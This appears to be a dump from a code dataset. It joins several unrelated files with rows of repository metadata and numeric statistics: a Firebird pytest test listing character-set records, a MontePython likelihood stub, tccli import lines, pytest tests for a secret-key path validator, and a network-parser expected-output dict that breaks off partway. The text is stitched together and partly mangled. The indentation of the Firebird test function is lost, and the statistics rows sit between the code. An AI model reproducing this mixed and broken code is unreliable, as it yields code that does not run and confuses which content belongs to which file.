RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS850
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS850
RDB$CHARACTER_SET_ID 11
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$190
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS865
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS865
RDB$CHARACTER_SET_ID 12
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$191
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS860
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS860
RDB$CHARACTER_SET_ID 13
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$204
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS863
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS863
RDB$CHARACTER_SET_ID 14
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$206
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS775
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS775
RDB$CHARACTER_SET_ID 15
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$209
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS858
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS858
RDB$CHARACTER_SET_ID 16
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$210
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS862
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS862
RDB$CHARACTER_SET_ID 17
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$211
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS864
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS864
RDB$CHARACTER_SET_ID 18
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$212
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME NEXT
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME NEXT
RDB$CHARACTER_SET_ID 19
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$220
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_1
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_1
RDB$CHARACTER_SET_ID 21
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$192
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_2
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_2
RDB$CHARACTER_SET_ID 22
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$193
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_3
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_3
RDB$CHARACTER_SET_ID 23
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$194
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_4
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_4
RDB$CHARACTER_SET_ID 34
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$195
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_5
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_5
RDB$CHARACTER_SET_ID 35
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$196
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_6
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_6
RDB$CHARACTER_SET_ID 36
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$197
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_7
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_7
RDB$CHARACTER_SET_ID 37
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$198
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_8
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_8
RDB$CHARACTER_SET_ID 38
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$199
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_9
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_9
RDB$CHARACTER_SET_ID 39
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$200
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME ISO8859_13
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME ISO8859_13
RDB$CHARACTER_SET_ID 40
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$201
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME KSC_5601
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME KSC_5601
RDB$CHARACTER_SET_ID 44
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$224
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS852
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS852
RDB$CHARACTER_SET_ID 45
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$202
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS857
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS857
RDB$CHARACTER_SET_ID 46
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$203
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS861
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS861
RDB$CHARACTER_SET_ID 47
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$205
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS866
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS866
RDB$CHARACTER_SET_ID 48
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$213
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME DOS869
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME DOS869
RDB$CHARACTER_SET_ID 49
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$214
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME CYRL
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME CYRL
RDB$CHARACTER_SET_ID 50
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$207
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1250
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1250
RDB$CHARACTER_SET_ID 51
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$215
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1251
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1251
RDB$CHARACTER_SET_ID 52
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$216
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1252
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1252
RDB$CHARACTER_SET_ID 53
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$217
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1253
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1253
RDB$CHARACTER_SET_ID 54
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$218
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1254
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1254
RDB$CHARACTER_SET_ID 55
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$219
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME BIG_5
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME BIG_5
RDB$CHARACTER_SET_ID 56
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$225
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME GB_2312
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME GB_2312
RDB$CHARACTER_SET_ID 57
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$226
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1255
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1255
RDB$CHARACTER_SET_ID 58
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$221
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1256
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1256
RDB$CHARACTER_SET_ID 59
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$222
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1257
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1257
RDB$CHARACTER_SET_ID 60
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$223
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME KOI8R
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME KOI8R
RDB$CHARACTER_SET_ID 63
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$227
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME KOI8U
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME KOI8U
RDB$CHARACTER_SET_ID 64
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$228
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME WIN1258
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME WIN1258
RDB$CHARACTER_SET_ID 65
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$229
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME TIS620
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME TIS620
RDB$CHARACTER_SET_ID 66
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 1
RDB$SECURITY_CLASS SQL$230
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME GBK
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME GBK
RDB$CHARACTER_SET_ID 67
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$231
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME CP943C
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME CP943C
RDB$CHARACTER_SET_ID 68
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 2
RDB$SECURITY_CLASS SQL$232
RDB$OWNER_NAME SYSDBA
RDB$CHARACTER_SET_NAME GB18030
RDB$FORM_OF_USE <null>
RDB$NUMBER_OF_CHARACTERS <null>
RDB$DEFAULT_COLLATE_NAME GB18030
RDB$CHARACTER_SET_ID 69
RDB$SYSTEM_FLAG 1
RDB$DESCRIPTION <null>
RDB$FUNCTION_NAME <null>
RDB$BYTES_PER_CHARACTER 4
RDB$SECURITY_CLASS SQL$233
RDB$OWNER_NAME SYSDBA
Records affected: 52
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_stdout == act_1.clean_expected_stdout
| 114.037481 | 288 | 0.173935 | 2,779 | 76,063 | 4.435049 | 0.082764 | 0.118134 | 0.127789 | 0.081704 | 0.81712 | 0.809168 | 0.809168 | 0.809168 | 0.686085 | 0.650385 | 0 | 0.049531 | 0.810749 | 76,063 | 666 | 289 | 114.208709 | 0.806669 | 0.003852 | 0 | 0.616554 | 0 | 0 | 0.993558 | 0.064389 | 0 | 0 | 0 | 0 | 0.001689 | 1 | 0.001689 | false | 0 | 0.003378 | 0 | 0.005068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9d7c1546f4b4d12f1d60d3da66395382518370f4 | 109 | py | Python | montepython/likelihoods/Planck15_lensing/__init__.py | archaeo-pteryx/montepython_public | 6fbcaa3266fd3a10a8e3ed4190dc65e6f29f1a37 | [
"MIT"
] | 69 | 2018-04-20T07:38:33.000Z | 2022-03-11T06:55:36.000Z | montepython/likelihoods/Planck15_lensing/__init__.py | archaeo-pteryx/montepython_public | 6fbcaa3266fd3a10a8e3ed4190dc65e6f29f1a37 | [
"MIT"
] | 263 | 2018-05-20T21:58:11.000Z | 2022-03-30T21:45:48.000Z | montepython/likelihoods/Planck15_lensing/__init__.py | archaeo-pteryx/montepython_public | 6fbcaa3266fd3a10a8e3ed4190dc65e6f29f1a37 | [
"MIT"
] | 78 | 2018-04-21T13:11:54.000Z | 2022-02-01T01:57:31.000Z | from montepython.likelihood_class import Likelihood_clik
class Planck15_lensing(Likelihood_clik):
pass
| 18.166667 | 56 | 0.844037 | 13 | 109 | 6.769231 | 0.692308 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 0.119266 | 109 | 5 | 57 | 21.8 | 0.895833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
9d9f55632b04f218d6c850bf75ac8564eb9af7a3 | 227 | py | Python | tccli/services/mongodb/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/mongodb/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/mongodb/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from tccli.services.mongodb.mongodb_client import register_arg
from tccli.services.mongodb.mongodb_client import get_actions_info
from tccli.services.mongodb.mongodb_client import AVAILABLE_VERSION_LIST
| 45.4 | 72 | 0.845815 | 32 | 227 | 5.75 | 0.53125 | 0.146739 | 0.277174 | 0.391304 | 0.701087 | 0.701087 | 0.701087 | 0 | 0 | 0 | 0 | 0.004762 | 0.07489 | 227 | 4 | 73 | 56.75 | 0.871429 | 0.092511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
9da88779ce06e2e9bcf78374320982a9fa1d65d5 | 1,033 | py | Python | tests/upload/test_secret_key_pattern.py | kave/enforcer-reloaded | 78b570859e9fc0b8b90d7e5a9dba8def0eeddf10 | [
"Apache-2.0"
] | 4 | 2019-09-09T19:59:45.000Z | 2021-01-20T07:24:38.000Z | tests/upload/test_secret_key_pattern.py | kave/enforcer-reloaded | 78b570859e9fc0b8b90d7e5a9dba8def0eeddf10 | [
"Apache-2.0"
] | 67 | 2019-08-01T13:29:31.000Z | 2021-08-01T11:17:24.000Z | tests/upload/test_secret_key_pattern.py | kave/enforcer | 78b570859e9fc0b8b90d7e5a9dba8def0eeddf10 | [
"Apache-2.0"
] | 2 | 2019-10-03T03:59:09.000Z | 2021-08-18T06:42:29.000Z | from pytest import raises
from upside.enforcer.upload.util import secret_key_pattern
def test_good_pattern():
assert secret_key_pattern('/test/test') == '/test/test'
assert secret_key_pattern('/test_test.-test/test.test-test') == '/test_test.-test/test.test-test'
def test_value_error():
with raises(Exception) as err:
secret_key_pattern('/test/')
assert err.typename == 'ValueError'
def test_bad_pattern():
with raises(ValueError):
secret_key_pattern('/test/')
with raises(ValueError):
secret_key_pattern('test')
with raises(ValueError):
secret_key_pattern('test/')
with raises(ValueError):
secret_key_pattern('test/test')
with raises(ValueError):
secret_key_pattern('test_test.-test/test.test-test')
with raises(ValueError):
secret_key_pattern('/test_/test.-test/test.test-test')
with raises(ValueError):
secret_key_pattern('/test/test/')
with raises(ValueError):
secret_key_pattern('/te$t/test')
| 25.195122 | 101 | 0.685382 | 132 | 1,033 | 5.106061 | 0.19697 | 0.308605 | 0.356083 | 0.379822 | 0.700297 | 0.700297 | 0.700297 | 0.700297 | 0.635015 | 0.611276 | 0 | 0 | 0.182962 | 1,033 | 40 | 102 | 25.825 | 0.798578 | 0 | 0 | 0.384615 | 0 | 0 | 0.198451 | 0.120039 | 0 | 0 | 0 | 0 | 0.115385 | 1 | 0.115385 | true | 0 | 0.076923 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9dace26c30a89ee5033ca8c9a22bcd7145413209 | 10,273 | py | Python | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z |
expected_output = {
'vrf':
{'VRF1':
{'address_family':
{'ipv4 unicast':
{'prefix':
{'10.85.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.1.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.2.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.3.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.4.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '16',
'nexthop': '10.51.1.101',
'out_label': '16',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.1.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '17',
'nexthop': '10.51.1.101',
'out_label': '17',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.2.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '18',
'nexthop': '10.51.1.101',
'out_label': '18',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.3.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '19',
'nexthop': '10.51.1.101',
'out_label': '19',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.4.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '20',
'nexthop': '10.51.1.101',
'out_label': '20',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}}},
'router_id': '10.81.1.1',
'table_version': 18}}},
'default':
{'address_family':
{'ipv4 unicast':
{'prefix':
{'10.4.0.0/16':
{'index':
{0:
{'best_path': False,
'in_label': 'nolabel',
'nexthop': '0.0.0.0',
'out_label': 'nolabel',
'status': 'invalid',
'type': 'aggregate',
'type_code': 'a'}}},
'10.171.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '10.51.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'10.171.1.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '10.51.1.101',
